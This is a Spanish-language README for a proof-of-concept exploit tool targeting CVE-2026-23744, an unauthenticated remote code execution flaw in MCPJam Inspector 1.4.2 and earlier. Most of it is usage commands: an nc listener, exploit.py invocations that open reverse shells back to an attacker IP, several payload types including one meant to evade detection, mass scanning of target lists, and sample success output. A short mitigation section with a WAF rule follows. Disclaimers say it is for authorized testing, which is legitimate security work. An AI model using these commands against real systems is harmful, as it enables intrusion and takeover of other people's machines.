
Una prueba de concepto de explotación para CVE-2026-23744 - vulnerabilidad de Ejecución Remota de Código (RCE) en MCPJam Inspector. Esta herramienta demuestra la falla de seguridad en versiones <=1.4.2 y ayuda a los investigadores de seguridad a verificar parches. Solo para pruebas autorizadas y fines educativos. Incluye múltiples opciones de payload, ejecución de comandos y gestión de sesiones.
Esta herramienta es SOLO para pruebas de seguridad autorizadas y fines educativos. El uso no autorizado es ilegal. Los usuarios asumen toda responsabilidad por sus acciones.
Este repositorio contiene una prueba de concepto del exploit para CVE-2026-23744, una vulnerabilidad de Ejecución Remota de Código (RCE) no autenticada encontrada en MCPJam Inspector versiones <=1.4.2. La vulnerabilidad tiene una puntuación CVSS crítica de 9.8, lo que indica un riesgo grave con un vector de ataque de red.
| Atributo | Detalles |
|---|---|
| ID CVE | CVE-2026-23744 |
| Vulnerabilidad | Ejecución Remota de Código no Autenticada |
| Versiones Afectadas | <=1.4.2 |
| Puntuación CVSS | 9.8 (Crítica) |
| Vector de Ataque | Red |

La herramienta de exploit ofrece un conjunto completo de características diseñadas para pruebas de seguridad efectivas:
Para configurar la herramienta de exploit, sigue estos pasos:
Clonar el repositorio:
git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
cd CVE-2026-23744-MCPJam-RCE-Exploit
Instalar dependencias:
pip install -r requirements.txt
Para iniciar una explotación básica, primero configura un listener y luego ejecuta el script de exploit:
# Iniciar listener
nc -lvnp 4444
# Ejecutar exploit
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444
Ejecuta comandos individuales o comandos desde un archivo:
# Ejecutar un solo comando
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"
# Ejecutar comandos desde un archivo
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt
Utiliza varios tipos de payload para diferentes escenarios:
# Shell inversa en Python
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python
# Shell inversa en Netcat
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc
# Payload codificado en Base64
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64
Escanea múltiples objetivos en busca de vulnerabilidades:
# Crear archivo de objetivos
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt
# Escanear objetivos vulnerables
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan
Explora funcionalidades avanzadas como identificación, uso de proxy, modo verbose y configuración automática de listener:
# Con identificación
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint
# Con proxy
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080
# Modo verbose
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v
# Listener automático
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen
| Tipo | Comando | Mejor Para |
|---|---|---|
bash | Shell inversa Bash | La mayoría de sistemas Linux |
python | Shell inversa Python3 | Sistemas con Python instalado |
nc | Shell inversa Netcat | Sistemas con netcat |
perl | Shell inversa Perl | Sistemas con Perl instalado |
php | Shell inversa PHP | Sistemas con PHP instalado |
base64 | Codificado en Base64 | Evadir detección |
[+] Iniciando exploit mejorado contra http://192.168.1.100:8080
[+] Shell inversa hacia 10.0.0.5:4444
[*] ID de Sesión: AbCdEfGh
[*] Identificando objetivo...
[+] SO objetivo: Ubuntu
[+] Capacidades disponibles: python3, perl, nc
[*] Ejecutando exploit...
[+] Exploit exitoso!
[!] Revisa tu listener de netcat en 10.0.0.5:4444
Para protegerse contra CVE-2026-23744, es crucial tomar las siguientes acciones inmediatas:
POST sospechosas a /api/mcp/connect.Ejemplo de regla Nginx WAF para bloquear patrones maliciosos comunes:
location /api/mcp/connect {
if ($request_body ~* "bash.*/dev/tcp") { return 403; }
if ($request_body ~* "base64.*-d") { return 403; }
proxy_pass http://backend;
}
P: ¿Es legal usar esto?
R: Esta herramienta solo es legal para usar en sistemas que poseas o para los que tengas permiso explícito por escrito para realizar pruebas.
P: ¿Qué sistemas son vulnerables?
R: Las versiones de MCPJam Inspector <=1.4.2 son vulnerables.
P: ¿Cómo puedo proteger mis sistemas?
R: Actualiza MCPJam Inspector a la versión >1.4.2 inmediatamente.
Sudeepa Wanigarathna
El uso no autorizado de esta herramienta es ilegal y puede acarrear graves consecuencias, incluyendo:
Hecho con ❤️ por Sudeepa Wanigarathna